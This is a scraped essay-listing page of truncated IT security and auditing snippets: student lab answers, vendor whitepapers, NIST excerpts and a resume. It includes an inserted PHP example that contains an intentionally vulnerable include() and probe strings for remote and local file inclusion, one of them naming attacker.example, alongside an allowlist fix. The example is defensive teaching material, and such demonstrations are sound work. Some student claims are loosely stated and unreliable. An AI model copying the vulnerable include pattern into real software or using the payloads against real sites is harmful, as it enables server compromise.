...and combine them into one final report. These reports will consist of: - The two auditing frameworks or hardening guidelines / security checklists used by the DoD. - How a security assessment addressing modern-day risks, threats, and vulnerabilities throughout the seven domains of a typical IT infrastructure can help an organization achieve compliance. - How to gather and obtain the information needed to perform a GLBA Financial Privacy & Safeguards Rules compliance audit, and what must be covered. - The top Workstation Domain risks, threats, and vulnerabilities, including their possible causes and the mitigations that prevent them. - The top LAN-to-WAN risks, threats, and vulnerabilities, including their possible causes and the mitigations that prevent them. - The top Remote Access Domain risks, threats, and vulnerabilities, and ways to mitigate them. - The top Systems/Application Domain risks, threats, and vulnerabilities, and ways to mitigate them. Part 1: Purpose: The purpose of Part 1 of this lab is to develop an executive summary regarding either the two auditing frameworks or the hardening guidelines/security checklists used by the DoD. For this, I have chosen to discuss the two auditing frameworks. Background: Some background on the AF (Auditing Framework) for the DoD is that it provides a foundation for developing and representing...
Words: 2140 - Pages: 9
...Student Lab Manual © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION. Auditing IT Infrastructures for Compliance, IS4680. Current Version Date: 11/21/2011. Copyright 2013 by Jones & Bartlett Learning, LLC, an Ascend Learning Company. www.jblearning.com ...
Words: 30948 - Pages: 124
...Reviewers: Darmadi Komo, Jack Richins, Devendra Tiwari Published: January 2012 Applies to: SQL Server 2012 and SQL Server 2014 Summary: Security is a crucial part of any mission-critical application. This paper describes best practices for setting up and maintaining security in SQL Server 2012. Copyright The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publication. This white paper is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT. Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of this document may be reproduced, stored in, or introduced into a retrieval system, or transmitted in any form or by any means (electronic, mechanical, photocopying, recording, or otherwise), or for any purpose, without the express written permission of Microsoft Corporation. Microsoft may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Microsoft, the...
Words: 15647 - Pages: 63
...1. What is a PHP Remote File Include (RFI) attack, and why are these prevalent in today's Internet world? RFI stands for Remote File Inclusion. It is a vulnerability in which a PHP application passes user-controlled input into an include or require statement, so the attacker can make the server fetch and execute a script hosted on a remote server (or, in the local variant, read or run files already on the host). It exploits poor input validation on websites and typically leads to code execution on the server, or to code execution in the visitor's browser (an XSS attack using JavaScript). RFI is a common vulnerability, and website hacking is not entirely focused on SQL injection. Using RFI an attacker can deface websites, gain access to the server, and do almost anything. What makes it more dangerous is that it takes only common sense and basic knowledge of PHP to execute. 2. What country is the top host of SQL Injection and SQL Slammer infections? Why can't the US Government do anything to prevent these injection attacks and infections? The U.S. is the top host of SQL Injection and SQL Slammer infections. Cybercriminals have made vast improvements to their infrastructure over the last few years, and thousands of websites remain vulnerable to SQL Injection. Malicious code writers have exploited these vulnerabilities to distribute malware so quickly that the government cannot contain such a large quantity. 3. What does it mean to have a policy of Nondisclosure in an organization? It is a contract in which the parties agree not to disclose information covered by the agreement. It outlines confidential material...
Words: 1109 - Pages: 5
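The lab answer above describes RFI in words. As an added example that is not part of that answer (the ?page= parameter, the template file names and the attacker host are assumed), here is the vulnerable include pattern that makes RFI possible, next to an allowlist-based fix that never lets request data reach include():

```php
<?php
// Added example (not from the lab answer above): a classic PHP Remote File
// Inclusion (RFI) bug next to a hardened version. Assumes a small "page
// router" that loads a template named by the ?page= query parameter; the
// parameter name and file names are illustrative.

// --- Vulnerable: the include path is built straight from user input.
// With allow_url_include=On, ?page=http://attacker.example/shell makes PHP
// fetch http://attacker.example/shell.php and execute it as server code.
// Even with remote includes disabled, ?page=../../../../etc/passwd style
// local inclusion (LFI) can still be tried. Kept as-is to show the bug.
function renderPageVulnerable(array $query): void
{
    $page = $query['page'] ?? 'home';
    include $page . '.php';          // DO NOT DO THIS
}

// --- Hardened: map the request onto a fixed allowlist of templates and
// refuse anything else. The request value is only ever an array key, never
// part of a path or URL.
const PAGE_TEMPLATES = [
    'home'    => __DIR__ . '/templates/home.php',
    'about'   => __DIR__ . '/templates/about.php',
    'contact' => __DIR__ . '/templates/contact.php',
];

/**
 * Resolve the requested page to an allowlisted template path, or null.
 */
function resolveTemplate(string $requested): ?string
{
    // Reject anything that is not a short lowercase slug before the lookup,
    // so stray bytes (NUL, "..", "://") never even reach the array.
    if (!preg_match('/^[a-z]{1,32}$/', $requested)) {
        return null;
    }
    return PAGE_TEMPLATES[$requested] ?? null;
}

function renderPageHardened(array $query): void
{
    $template = resolveTemplate((string)($query['page'] ?? 'home'));
    if ($template === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $template;
}

// Self-check of the resolver with constructed inputs. Only the decision is
// inspected, so no real template files are needed to run this.
$probes = [
    'home',                               // legitimate request
    'http://attacker.example/shell',      // classic RFI payload
    '../../../../etc/passwd',             // LFI attempt
    "home\0",                             // NUL-byte truncation trick
];
foreach ($probes as $p) {
    printf("%-36s => %s\n",
        addcslashes($p, "\0"),
        resolveTemplate($p) === null ? 'rejected' : 'allowed');
}
```

Run it with `php rfi_demo.php`: only `home` is allowed, the three attack strings are rejected. The important design choice is that the fix does not try to filter bad characters out of a path; it refuses to build a path from the request at all, which also removes the LFI and NUL-byte variants that character filtering tends to miss. Setting `allow_url_include=Off` (and `allow_url_fopen=Off` where possible) in php.ini is a worthwhile second layer, but it does not fix the code.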
...QUALYSGUARD® ROLLOUT GUIDE July 12, 2012 Copyright 2011-2012 by Qualys, Inc. All Rights Reserved. Qualys, the Qualys logo and QualysGuard are registered trademarks of Qualys, Inc. All other trademarks are the property of their respective owners. Qualys, Inc. 1600 Bridge Parkway Redwood Shores, CA 94065 1 (650) 801 6100
Preface
Chapter 1 Introduction
  Operationalizing Security and Policy Compliance ... 10
  QualysGuard Best Practices ... 11
Chapter 2 Rollout First Steps
  First Login
    Complete the User Registration
    Your Home Page
    View Host Assets
    Add Hosts
    Remove IPs from the Subscription
    Add Virtual Hosts
    Check Network Access to Scanners ...
Words: 38236 - Pages: 153
...in turn ensure they meet the specific purposes for which they have been developed. Core Competencies • Well experienced in the Assurance Domain and Banking Domain (mortgage banking), the most recent project being testing of Performance and Attribution Reporting for a JPMorgan Chase client using the BI-SAM BONE application. • Exposure to a wide business domain in auditing, tax and advisory services for US and mortgage banking. • Effective team leader and efficient individual contributor; successfully led and delivered two projects on time with a 4-member team. • Worked for Wells Fargo as a QA testing team member on the Image and Content Management Platform project. • Web application testing, stand-alone application testing and regression testing. • Experienced in functional, non-functional and system testing. • Hands-on experience in database and web services testing. • Extensive experience using Quality Center & ALM (used as the test management tool for tracking and reporting requirement traceability, test preparation, test execution and defect management). • Preparing test plans, test data and traceability matrices, and executing test scripts. • Obtained ISTQB Foundation Level certificate. ACHIEVEMENTS • Obtained a TCS certificate as an outstanding resource for the contribution made to the "Connected Work Paper" application. • Obtained appreciation from the team manager for working proactively and delivering the deliverables within...
Words: 1542 - Pages: 7
... Mapping Business Controls to the IT Application: An IS Auditor can help ensure that the necessary business controls are mapped into the application controls. He/she can ascertain that the business controls are built in at the development stage itself, if engaged at the project stage. Business Process Re-engineering: There is a difference between automation and computerisation: in the former the existing manual process is automated using computers, while in the latter the existing process is redesigned before it is computerised. In the latter the benefit is absorbed more effectively, but it can pose serious problems if some basic controls are omitted. An IS Auditor who is part of this exercise ensures that the basic controls required by the business exist in the re-engineered process. The IT Security Policy: The IS Auditor, through extensive engagement with the organisation, is able to say which parts of the policy are being complied with, and can also offer suggestions on improving compliance and making suitable changes to the IT policy. He can also offer guidance in those areas which may not be adequately addressed in the policy. Security Awareness: An effective IS audit helps increase the level of security awareness and compliance with security measures among IT users. It also motivates security officers and system administrators to do their jobs effectively. Better Return on Investment: IS audits are nowadays considered not only for security but also for performance management and value from IT investments...
Words: 477 - Pages: 2
...Executive Summary The need for auditors with technology skills has increased, which is why the IT auditing profession has become very important. Information technology auditors analyze the information technology structure, operations, and software of an organization. They are in charge of identifying ways in which the organization's systems can meet its needs in a better and more reliable way. IT auditors may design new systems by configuring hardware and software, and they also test the systems to make sure they are working properly. Most IT auditors work in offices, naturally with computer systems. Some IT auditors work with the same company for years, making sure the information systems and internal controls work properly. Others work for CPA firms that provide auditing services and are required to travel to evaluate the information systems of clients. For the most part IT auditors work independently, but when they are assigned to larger or more complicated projects they collaborate with peers. James Reinhard, CPA, CIA, CISA, manager at Simon Property Group Inc., who has more than 20 years' experience in IT and integrated auditing, states that "The ideal IT auditor should be able to discuss IP routing with the network folks in one hour and financial statement disclosures with the controller in the next" (Scharf, 2008). To become the ideal IT auditor, IT audit certifications are the best option. IT audit...
Words: 5614 - Pages: 23
...Information Security Office Security Assessment Description and Questionnaire The Information Security Office offers many types of assessments to meet our customers' needs. This document explains the process for requesting an assessment, describes the set of security assessment services that the Information Security Office (ISO) offers to members of the campus community, and provides a questionnaire that is used to assist in understanding the target environment. The ISO is not able to assess every possible platform or application, nor is it possible for the ISO to meet every timeline requirement. In those cases, the ISO may contract with external partners to deliver the requested assessment service. There may be associated costs that will need to be passed along to the requesting organizational unit. Process: The Information Security Office has created a simple process around vulnerability assessments to provide clarity and consistency. The process is outlined and diagrammed below. 1. Contact the ISO (request assessment) 2. The ISO accepts the project 3. A questionnaire (later in this document) is completed by the customer 4. A scoping/kick-off meeting is held • The goal of the meeting is to determine which type of assessment is appropriate, the scope of the assessment, a timeline and contact information. The product of the meeting is a Statement of Work that will be agreed upon and...
Words: 1566 - Pages: 7
...Client Workstations: For the client workstation domain, we (Dominique and Kendal) plan to implement full-disk encryption with a 128-bit key on all users' desktops, laptops, cellphones, tablets, and company-assigned bring-your-own devices (BYOD). For all Level 1 security users, which include employees, contractors, vendors, departments and managers, there will be a 90-day password expiration that forces the user to change their password at the end of 90 days; passwords cannot be reused for 9 months. Each password has to be at least 24 characters with at least one capital letter, one symbol and one number. For all Level 2 workstations, which include network administrators, we are going to implement CAC cards (Common Access Cards) with a PIN for the main login. Fingerprint access will be required to enter any Level 2 security workstation or work area, and a key card will be required for entry to any Level 2 work area. Our Level 3 client workstations include senior administrators, junior administrators, the co-CEO and the CEO. We plan to implement a fingerprint scanner to boot the workstation and a pre-boot password for the 128-bit disk encryption to log on. In order to enter a Level 3 workstation area, users will be required to use a CAC magnetic card and a fingerprint, and must be cleared by 24-hour surveillance to enter the Level 3 workstation area. Server areas: For Richman Investments, each server room will have 24-hour...
Words: 751 - Pages: 4
...4 September 2004 Paper on "Formulation of IT Auditing Standards" By Ms. Puja S. Mandol and Ms. Monika Verma, Supreme Audit Institution of India. Introduction The use of computers and computer-based information systems has pervaded deep and wide in every modern-day organization. An organization must exercise control over these computer-based information systems because the cost of errors and irregularities that may arise in them can be high and can even challenge the very existence of the organization. An organization's ability to survive can be severely undermined through corruption or destruction of its database; decision-making errors caused by poor-quality information systems; losses incurred through computer abuse; loss of computer assets; and loss of control over how computers are used within the organization. Therefore managements across the world have deployed specialized auditors to audit their information systems to find gaps between declared policies and actual use, and shortcomings in information system design and usage. Information Systems Audit is the process of collecting and evaluating evidence to determine whether a computer system has been designed to maintain data integrity, safeguard assets, allow organizational goals to be achieved effectively and use resources efficiently. The IS Auditor should see not only that adequate internal controls exist in the system but also that they work effectively to ensure results...
Words: 6839 - Pages: 28
...Appendix C for the full list of references and Appendix A for a list of major security controls relevant for WLAN security). This publication does not eliminate the need to follow recommendations in other NIST publications, such as [SP800-48] and [SP800-97]. If there is a conflict between recommendations in this publication and another NIST wireless publication, the recommendation in this publication takes precedence. NIST Special Publication 800-53 is part of the Special Publication 800-series that reports on the Information Technology Laboratory’s (ITL) research, guidelines, and outreach efforts in information system security, and on ITL’s activity with industry, government, and academic organizations. Specifically, NIST Special Publication 800-53 covers the steps in the Risk Management Framework that address security control selection for federal information systems in accordance with the security requirements in Federal Information Processing Standard (FIPS) 200. This includes selecting an initial set of baseline security controls based on a FIPS 199 worst-case impact analysis, tailoring the baseline security controls, and supplementing the security controls based on an organizational assessment of risk. The security rules cover 17 areas including access control,...
Words: 1201 - Pages: 5
...standards, procedures, and guidelines to protect confidential data.
* Adopting a data classification standard that defines how to treat data throughout AT.
* Limiting access to systems and applications that house confidential data to only those authorized to use it.
* Using cryptographic techniques to hide confidential data so that it is unreadable to unauthorized users.
* Encrypting data that crosses the public Internet.
* Encrypting data that is stored within databases and storage devices.
4. Definition of policy, standard, guideline, procedure
* Policy: a written statement that the people in charge of an organization have set as a course of action or direction. Policies come from upper management and apply to the whole organization.
* Standard: detailed information on hardware and software and how they are to be used; ensures consistent security controls are used throughout the IT system.
* Procedure: instructions for how to carry out policies and standards: a plan of action for installation, testing, auditing.
* Guidelines: a suggested course of action for applying the policy, standard or procedure.
5. Definition of classification of data
* The goal and objective of a data classification standard (DCS) is to provide a consistent definition of how an organization should handle and secure different types of data: private data, confidential, internal use only, and public domain data.
6. Result of a lapse in security...
Words: 963 - Pages: 4
...Daejeon, Korea 2 Dept. of Information Communication, Sunchon University, Sunchon, Korea 3 Fumate Inc., Daejeon, Korea rosslin_john@yahoo.com, secho@sunchon.ac.kr, yslee@fumate.com, taihoonn@empal.com Abstract The Sarbanes-Oxley (SOX) Act is a United States federal law enacted on July 30, 2002 in response to a number of major corporate and accounting scandals including those affecting Enron, Tyco International, Adelphia, Peregrine Systems and WorldCom. This paper discusses the effects of the Sarbanes-Oxley (SOX) Act on corporate information security governance practices. The resultant regulatory intervention forces a company to revisit its internal control structures and assess the nature and scope of its compliance with the law. This paper reviews the implications emerging from mandatory compliance with the Sarbanes-Oxley (SOX) Act. Issues related to IT governance and the general integrity of the enterprise are also identified and discussed. Industry internal control assessment frameworks, such as COSO and COBIT, are reviewed and their usefulness in ensuring compliance evaluated. 1. Introduction Accounting scandals at some of the big corporations like Enron, HealthSouth, Tyco and WorldCom had a devastating impact on investor confidence. Clearly, it was possible to engage in frauds of such magnitude because of the inability of auditors to detect early signs of such possibilities. This paper reviews the impact of legal controls on Information Technology (IT) governance practices, especially...
Words: 3348 - Pages: 14
...Lab 6: Auditing the Workstation Domain for Compliance Question 1 – What are some common risks, threats, and vulnerabilities found in the Remote Access Domain that must be mitigated through a layered security strategy? a. Some common risks, threats, or vulnerabilities are stolen company laptops, software keyloggers being installed on computers and stealing passwords and user accounts, data leakage, and unauthorized access to the network. Question 2 – File-sharing utilities and client-to-client communication applications can provide the ability to share files with other users (i.e. peer-to-peer networking or sharing). What risks and/or vulnerabilities are introduced with these applications? a. Many of these share data in clear text. If a user uses the same password for logging into one of these utilities as they do for their network login or any other sensitive login, the password can easily be compromised. Question 3 – Explain how confidentiality can be achieved within the Workstation Domain with security controls and security countermeasures. a. You can achieve this by using GPOs and WMI filters. These push workstation security policies to the computers, such as locking the computer if it is idle for more than 5 minutes, or blocking access to parts of the computer such as the Control Panel. Question 4 – Explain how data integrity can be achieved within the Workstation Domain with security controls and security countermeasures. a. Security controls...
Words: 951 - Pages: 4